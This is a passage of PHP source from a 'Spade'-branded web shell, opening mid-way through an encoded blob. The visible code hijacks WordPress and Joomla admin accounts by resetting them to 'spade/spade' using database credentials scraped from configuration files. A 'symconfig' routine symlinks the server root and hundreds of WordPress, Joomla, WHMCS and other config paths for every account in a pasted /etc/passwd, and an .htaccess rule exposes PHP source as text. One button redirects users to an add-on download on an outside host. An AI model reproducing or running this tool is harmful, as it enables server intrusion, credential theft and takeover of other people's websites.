dwY29uZmlnLiInKTwvc2NyaXB0PjwvY2VudGVyPiI7CiAgICAgICAgICAgICAgICB9ICAgICAgIAoKCiAgICAgICAgICAgIH0="));
  1955. }elseif($_GET['do'] == 'about') {
  1956.  
  1957. echo "<script>function copy(text) { window.prompt('Copy to clipboard: Ctrl+C, Enter', text); }</script><center><font color='lime'><pre>
  1958. ___ ___ ___ ___
  1959. / /\ ___ / /\ / /\ / /\
  1960. / /::\ / /\ / /::\ / /::\ / /::\
  1961. /__/:/\:\ / /::\ / /:/\:\ / /:/\:\ / /:/\:\
  1962. _\_ \:\ \:\ / /:/\:\ / /::\ \:\ / /:/ \:\ / /::\ \:\
  1963. /__/\ \:\ \:\ / /::\ \:\ /__/:/\:\_\:\ /__/:/ \__\:| /__/:/\:\ \:\
  1964. \ \:\ \:\_\/ /__/:/\:\_\:\ \__\/ \:\/:/ \ \:\ / /:/ \ \:\ \:\_\/
  1965. \ \:\_\:\ \__\/ \:\/:/ \__\::/ \ \:\ /:/ \ \:\ \:\
  1966. \ \:\/:/ \ \::/ / /:/ \ \:\/:/ \ \:\_\/
  1967. \ \::/ \__\/ /__/:/ \__\::/ \ \:\
  1968. \__\/ \__\/ ~~ \__\/
  1969.  
  1970.  
  1971. </pre></font><p1>Special Greets to: <a class='wenk' href='https://www.facebook.com/indoxploit/' target='_BLANK'>IndoXploit</a> | <a class='wenk' href='https://www.facebook.com/AnonGhostTeamOfficial/' target='_BLANK'>An0nGh0st Team</a> | <a class='wenk' href='https://www.facebook.com/SpadePiratesOfficial/' target='_BLANK'>Spade Pirates</a> | <a href='https://www.facebook.com/PureHackers.Sec/' class='wenk' target='_BLANK'>PureHackers International</a> | <a class='wenk' href='https://www.facebook.com/lagunagov.ph/' target='_BLANK'>Anonymous Laguna</a></p1><br><p1>We Are: <a class='wenk' href='https://fb.com/Meowertsz' target='_BLANK'>Spade</a> | <a class='wenk' href='https://fb.com/yin.lalican' target='_BLANK'>Jok3r</a> | <a class='wenk' href='https://fb.com/AnonymousM3' target='_BLANK'>Arcangel</a> | <a class='wenk' href='https://fb.com/vince.sombrero' target='_BLANK'>B74ck C4p</a><br><a color='red' onclick='copy(\"5p4d3@protonmail.com\")'>Report a bug</a><br></p1><form method=post><input type=submit value='Install Spade Hackbar Mod' name='hackbar'></form>";
  1972. if(isset($_POST['hackbar'])){
  1973. if(strlen(strstr($_SERVER['HTTP_USER_AGENT'],"Firefox")) <= 0 ){
  1974. // if not firefox
  1975. echo "<font color=red>You need to Download/Install Firefox to Install this Addon<br>";
  1976. echo "Your Browser: " . $_SERVER['HTTP_USER_AGENT']."</font>";
  1977. }else{
  1978. echo '<meta http-equiv="refresh" content="0; URL=http://www.kindergarden-xuzhou.com/public/spade.xpi">';
  1979. }
  1980. }
  1981. echo "</center>";
  1982. } elseif($_GET['do'] == 'auto_cu_wp') {
  1983. if($_POST['gass']) {
  1984. echo "<center><h1 class='titulo'>WordPress Auto Change User 2</h1>
  1985. <form method='post'>
  1986. Link Config: <br>
  1987. <textarea name='link' style='width: 450px; height:250px;'>";
  1988. UrlLoop($_POST['linkconf'],'wordpress');
  1989. echo"</textarea><br>
  1990. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Submit'>
  1991. </form></center>";
  1992. } else {
  1993. echo "<center><h1 class='titulo'>WordPress Auto Change User 2</h1>
  1994. <form method='post'>
  1995. Link Config: <br>
  1996. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/spade_sym/'><br>
  1997. <input type='submit' style='width: 450px;' name='gass' value='Submit'>
  1998. </form></center>";
  1999. }
  2000. if($_POST['auto_cu_wp']) {
  2001.  
  2002. function anucurl($sites) {
  2003. $ch = curl_init($sites);
  2004. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2005. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2006. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2007. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2008. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2009. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2010. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2011. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2012. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2013. $data = curl_exec($ch);
  2014. curl_close($ch);
  2015. return $data;
  2016. }
  2017. $link = explode("\r\n", $_POST['link']);
  2018. $user = "spade";
  2019. $pass = "spade";
  2020. $passx = md5($pass);
  2021. foreach($link as $dir_config) {
  2022. $config = anucurl($dir_config);
  2023. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2024. $dbuser = ambilkata($config,"DB_USER', '","'");
  2025. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2026. $dbname = ambilkata($config,"DB_NAME', '","'");
  2027. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2028. $prefix = $dbprefix."users";
  2029. $option = $dbprefix."options";
  2030. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2031. $db = mysql_select_db($dbname);
  2032. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2033. $result = mysql_fetch_array($q);
  2034. $id = $result[ID];
  2035. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2036. $result2 = mysql_fetch_array($q2);
  2037. $target = $result2[option_value];
  2038. if($target == '') {
  2039. echo "[-] <font color=red>error, can not take its domain name</font><br>";
  2040. } else {
  2041. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  2042. }
  2043. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2044. if(!$conn OR !$db OR !$update) {
  2045. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2046. mysql_close($conn);
  2047. } else {
  2048. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2049. echo "[+] username: <font color=lime>$user</font><br>";
  2050. echo "[+] password: <font color=lime>$pass</font><br><br>";
  2051.  
  2052. mysql_close($conn);
  2053. }
  2054. }
  2055. }
  2056. }elseif($_GET['do'] == 'auto_cu_joomla') {
  2057. if($_POST['gass']) {
  2058. echo "<center><h1 class='titulo'>Joomla Auto Change User 2</h1>
  2059. <form method='post'>
  2060. Link Config: <br>
  2061. <textarea name='link' style='width: 450px; height:250px;'>";
  2062. UrlLoop($_POST['linkconf'],'joomla');
  2063. echo"</textarea><br>
  2064. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  2065. </form></center>";
  2066. } else {
  2067. echo "<center><h1 class='titulo'>Joomla Auto Change User 2</h1>
  2068. <form method='post'>
  2069. Link Config: <br>
  2070. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/spade_sym/'><br>
  2071. <input type='submit' style='width: 450px;' name='gass' value='Submit!!'>
  2072. </form></center>";
  2073. }
  2074. if($_POST['auto_cu_joomla']) {
  2075. function anucurl($sites) {
  2076. $ch = curl_init($sites);
  2077. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2078. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2079. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2080. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2081. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2082. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2083. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2084. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2085. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2086. $data = curl_exec($ch);
  2087. curl_close($ch);
  2088. return $data;
  2089. }
  2090. $link = explode("\r\n", $_POST['link']);
  2091. $user = "spade";
  2092. $pass = "spade";
  2093. $passx = md5($pass);
  2094. foreach($link as $dir_config) {
  2095. $config = anucurl($dir_config);
  2096. $dbhost = ambilkata($config,"host = '","'");
  2097. $dbuser = ambilkata($config,"user = '","'");
  2098. $dbpass = ambilkata($config,"password = '","'");
  2099. $dbname = ambilkata($config,"db = '","'");
  2100. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2101. $prefix = $dbprefix."users";
  2102. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2103. $db = mysql_select_db($dbname);
  2104. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2105. $result = mysql_fetch_array($q);
  2106. $id = $result['id'];
  2107. $site = ambilkata($config,"sitename = '","'");
  2108. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  2109. echo "Config => ".$dir_config."<br>";
  2110. echo "CMS => Joomla<br>";
  2111. if($site == '') {
  2112. echo "Sitename => <font color=red>error, could not get its domain name</font><br>";
  2113. } else {
  2114. echo "Sitename => $site<br>";
  2115. }
  2116. if(!$update OR !$conn OR !$db) {
  2117. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2118. } else {
  2119. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  2120. }
  2121. mysql_close($conn);
  2122. }
  2123. }
  2124. }elseif($_GET['do'] == 'symconfig') {
  2125. if(strtolower(substr(PHP_OS, 0, 3)) == 'win'){
  2126. echo "<font color='red'>This feature is Not Windows Server!</font>";
  2127. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  2128. exit;
  2129. }else{
  2130. echo "<center><h1 class='titulo'>SYM/CONFIG 2</h1></center><br>";
  2131. if($_POST["m"] && !$_POST["passwd"]==""){
  2132. @mkdir("spade_sym", 0777);
  2133. @chdir("spade_sym");
  2134. @symlink("/","root");
  2135. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex spade.htm\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any";
  2136. @file_put_contents(".htaccess",$htaccess);
  2137. $etc_passwd=$_POST["passwd"];
  2138. $etc_passwd=explode("\n",$etc_passwd);
  2139. foreach($etc_passwd as $passwd){
  2140. $pawd=explode(":",$passwd);
  2141. $user =$pawd[0];
  2142.  
  2143. @symlink('/','spade_sym/root');
  2144. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2145. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2146. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2147. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2148. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2149. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2150. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2151. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2152. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2153. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2154. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2155. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2156. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2157. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2158. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2159. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2160. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2161. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2162. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2163. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2164. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2165. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2166. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2167. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2168. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2169. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2170. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2171. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2172. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2173. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2174. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2175. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2176. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2177. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2178. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2179. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2180. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2181. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2182. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2183. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2184. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2185. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2186. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2187. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2188. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2189. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2190. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2191. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2192. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2193. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2194. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2195. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2196. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2197. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2198. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2199. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2200. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2201. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2202. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2203. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2204. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2205. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2206. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2207. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2208. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2209. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2210. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2211. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2212. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2213. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2214. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2215. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2216. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2217. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2218. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2219. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2220. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2221. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2222. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2223. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2224. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2225. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2226. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2227. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2228. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2229. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2230. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2231. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2232. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2233. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2234. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2235. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2236. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2237. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2238. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2239. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2240. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2241. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2242. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2243. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2244. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2245. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2246. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2247. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2248. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2249. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2250. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2251. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2252. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2253. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2254. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2255. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2256. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2257. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2258. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2259. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2260. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2261. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2262. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2263. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2264. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2265. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2266. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2267. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2268. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2269. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2270. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2271. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2272. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2273. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2274. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2275. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2276. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2277. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2278. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2279. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2280. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2281. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2282. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2283. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2284. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2285. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2286. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2287. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2288. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2289. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2290. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2291. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2292. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2293. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2294. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2295. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2296. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2297. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2298. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2299. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2300. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2301. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2302. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2303. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2304. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2305. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2306. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2307. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2308. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2309. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2310. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2311. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2312. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2313. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2314. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2315. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2316. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2317. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2318. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2319. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2320. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2321. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2322. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2323. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2324.  
  2325. //Home1
  2326.  
  2327. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2328. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2329. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2330. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2331. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2332. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2333. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2334. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2335. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2336. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2337. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2338. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2339. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2340. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2341. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2342. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2343. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2344. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2345. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2346. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
